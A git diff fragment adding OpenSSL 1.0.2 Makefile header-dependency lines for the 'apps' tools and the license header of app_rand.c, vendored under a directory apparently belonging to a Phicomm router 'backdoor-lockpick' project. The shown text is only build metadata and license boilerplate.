+passwd.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+passwd.o: ../include/openssl/crypto.h ../include/openssl/des.h
+passwd.o: ../include/openssl/des_old.h ../include/openssl/e_os2.h
+passwd.o: ../include/openssl/err.h ../include/openssl/evp.h
+passwd.o: ../include/openssl/lhash.h ../include/openssl/md5.h
+passwd.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+passwd.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+passwd.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+passwd.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+passwd.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+passwd.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+passwd.o: ../include/openssl/txt_db.h ../include/openssl/ui.h
+passwd.o: ../include/openssl/ui_compat.h ../include/openssl/x509.h
+passwd.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+passwd.o: passwd.c
+pkcs12.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkcs12.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkcs12.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkcs12.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkcs12.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkcs12.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkcs12.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkcs12.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkcs12.o: ../include/openssl/pem2.h ../include/openssl/pkcs12.h
+pkcs12.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+pkcs12.o: ../include/openssl/sha.h ../include/openssl/stack.h
+pkcs12.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+pkcs12.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+pkcs12.o: ../include/openssl/x509v3.h apps.h pkcs12.c
+pkcs7.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkcs7.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkcs7.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkcs7.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkcs7.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkcs7.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkcs7.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkcs7.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkcs7.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+pkcs7.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+pkcs7.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+pkcs7.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+pkcs7.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+pkcs7.o: pkcs7.c
+pkcs8.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkcs8.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkcs8.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkcs8.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkcs8.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkcs8.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkcs8.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkcs8.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkcs8.o: ../include/openssl/pem2.h ../include/openssl/pkcs12.h
+pkcs8.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+pkcs8.o: ../include/openssl/sha.h ../include/openssl/stack.h
+pkcs8.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+pkcs8.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+pkcs8.o: ../include/openssl/x509v3.h apps.h pkcs8.c
+pkey.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkey.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkey.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkey.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkey.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkey.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkey.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkey.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkey.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+pkey.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+pkey.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+pkey.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+pkey.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h pkey.c
+pkeyparam.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkeyparam.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkeyparam.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkeyparam.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkeyparam.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkeyparam.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkeyparam.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkeyparam.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkeyparam.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+pkeyparam.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+pkeyparam.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+pkeyparam.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+pkeyparam.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+pkeyparam.o: pkeyparam.c
+pkeyutl.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkeyutl.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkeyutl.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkeyutl.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkeyutl.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkeyutl.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkeyutl.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkeyutl.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkeyutl.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+pkeyutl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+pkeyutl.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+pkeyutl.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+pkeyutl.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+pkeyutl.o: pkeyutl.c
+prime.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+prime.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+prime.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+prime.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+prime.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+prime.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+prime.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+prime.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+prime.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+prime.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+prime.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+prime.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+prime.o: prime.c
+rand.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rand.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+rand.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+rand.o: ../include/openssl/err.h ../include/openssl/evp.h
+rand.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+rand.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+rand.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+rand.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+rand.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+rand.o: ../include/openssl/sha.h ../include/openssl/stack.h
+rand.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+rand.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+rand.o: ../include/openssl/x509v3.h apps.h rand.c
+req.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+req.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+req.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+req.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+req.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+req.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+req.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+req.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+req.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+req.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+req.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+req.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+req.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+req.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+req.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h req.c
+rsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rsa.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+rsa.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+rsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+rsa.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+rsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+rsa.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+rsa.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+rsa.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+rsa.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+rsa.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+rsa.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+rsa.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+rsa.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h rsa.c
+rsautl.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rsautl.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+rsautl.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+rsautl.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+rsautl.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+rsautl.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+rsautl.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+rsautl.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+rsautl.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+rsautl.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+rsautl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+rsautl.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+rsautl.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+rsautl.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+rsautl.o: rsautl.c
+s_cb.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s_cb.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+s_cb.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+s_cb.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s_cb.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s_cb.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s_cb.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s_cb.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+s_cb.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s_cb.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s_cb.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s_cb.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+s_cb.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s_cb.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s_cb.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s_cb.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s_cb.o: ../include/openssl/tls1.h ../include/openssl/txt_db.h
+s_cb.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+s_cb.o: ../include/openssl/x509v3.h apps.h s_apps.h s_cb.c
+s_client.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s_client.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+s_client.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+s_client.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+s_client.o: ../include/openssl/err.h ../include/openssl/evp.h
+s_client.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+s_client.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+s_client.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+s_client.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s_client.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s_client.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s_client.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s_client.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s_client.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s_client.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s_client.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s_client.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s_client.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+s_client.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+s_client.o: s_apps.h s_client.c timeouts.h
+s_server.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s_server.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+s_server.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+s_server.o: ../include/openssl/dh.h ../include/openssl/dtls1.h
+s_server.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s_server.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s_server.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s_server.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s_server.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+s_server.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s_server.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s_server.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s_server.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+s_server.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s_server.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s_server.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s_server.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s_server.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s_server.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+s_server.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+s_server.o: s_apps.h s_server.c timeouts.h
+s_socket.o: ../e_os.h ../e_os2.h ../include/openssl/asn1.h
+s_socket.o: ../include/openssl/bio.h ../include/openssl/buffer.h
+s_socket.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+s_socket.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+s_socket.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s_socket.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s_socket.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s_socket.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+s_socket.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s_socket.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s_socket.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s_socket.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s_socket.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s_socket.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s_socket.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s_socket.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s_socket.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+s_socket.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+s_socket.o: s_apps.h s_socket.c
+s_time.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s_time.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+s_time.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+s_time.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s_time.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s_time.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s_time.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s_time.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+s_time.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s_time.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s_time.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s_time.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s_time.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s_time.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s_time.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s_time.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s_time.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+s_time.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+s_time.o: s_apps.h s_time.c
+sess_id.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+sess_id.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+sess_id.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+sess_id.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+sess_id.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+sess_id.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+sess_id.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+sess_id.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+sess_id.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+sess_id.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+sess_id.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+sess_id.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+sess_id.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+sess_id.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+sess_id.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+sess_id.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+sess_id.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+sess_id.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+sess_id.o: sess_id.c
+smime.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+smime.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+smime.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+smime.o: ../include/openssl/err.h ../include/openssl/evp.h
+smime.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+smime.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+smime.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+smime.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+smime.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+smime.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+smime.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+smime.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+smime.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+smime.o: smime.c
+speed.o: ../e_os.h ../include/openssl/aes.h ../include/openssl/asn1.h
+speed.o: ../include/openssl/bio.h ../include/openssl/blowfish.h
+speed.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+speed.o: ../include/openssl/camellia.h ../include/openssl/cast.h
+speed.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+speed.o: ../include/openssl/des.h ../include/openssl/des_old.h
+speed.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+speed.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+speed.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+speed.o: ../include/openssl/lhash.h ../include/openssl/md4.h
+speed.o: ../include/openssl/md5.h ../include/openssl/mdc2.h
+speed.o: ../include/openssl/modes.h ../include/openssl/obj_mac.h
+speed.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+speed.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+speed.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+speed.o: ../include/openssl/rand.h ../include/openssl/rc2.h
+speed.o: ../include/openssl/rc4.h ../include/openssl/ripemd.h
+speed.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+speed.o: ../include/openssl/seed.h ../include/openssl/sha.h
+speed.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+speed.o: ../include/openssl/txt_db.h ../include/openssl/ui.h
+speed.o: ../include/openssl/ui_compat.h ../include/openssl/whrlpool.h
+speed.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+speed.o: ../include/openssl/x509v3.h apps.h speed.c testdsa.h testrsa.h
+spkac.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+spkac.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+spkac.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+spkac.o: ../include/openssl/err.h ../include/openssl/evp.h
+spkac.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+spkac.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+spkac.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+spkac.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+spkac.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+spkac.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+spkac.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+spkac.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+spkac.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+spkac.o: spkac.c
+srp.o: ../include/openssl/opensslconf.h srp.c
+ts.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ts.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+ts.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+ts.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+ts.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ts.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+ts.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ts.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+ts.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ts.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ts.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+ts.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+ts.o: ../include/openssl/sha.h ../include/openssl/stack.h
+ts.o: ../include/openssl/symhacks.h ../include/openssl/ts.h
+ts.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+ts.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h ts.c
+verify.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+verify.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+verify.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+verify.o: ../include/openssl/err.h ../include/openssl/evp.h
+verify.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+verify.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+verify.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+verify.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+verify.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+verify.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+verify.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+verify.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+verify.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+verify.o: verify.c
+version.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+version.o: ../include/openssl/blowfish.h ../include/openssl/bn.h
+version.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+version.o: ../include/openssl/crypto.h ../include/openssl/des.h
+version.o: ../include/openssl/des_old.h ../include/openssl/e_os2.h
+version.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+version.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+version.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+version.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+version.o: ../include/openssl/pkcs7.h ../include/openssl/rc4.h
+version.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+version.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+version.o: ../include/openssl/txt_db.h ../include/openssl/ui.h
+version.o: ../include/openssl/ui_compat.h ../include/openssl/x509.h
+version.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+version.o: version.c
+x509.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+x509.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+x509.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+x509.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+x509.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+x509.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+x509.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+x509.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+x509.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+x509.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+x509.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+x509.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+x509.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+x509.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+x509.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h x509.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/app_rand.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/app_rand.c
new file mode 100644
index 0000000..595fc78
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/app_rand.c
@@ -0,0 +1,220 @@
+/* apps/app_rand.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
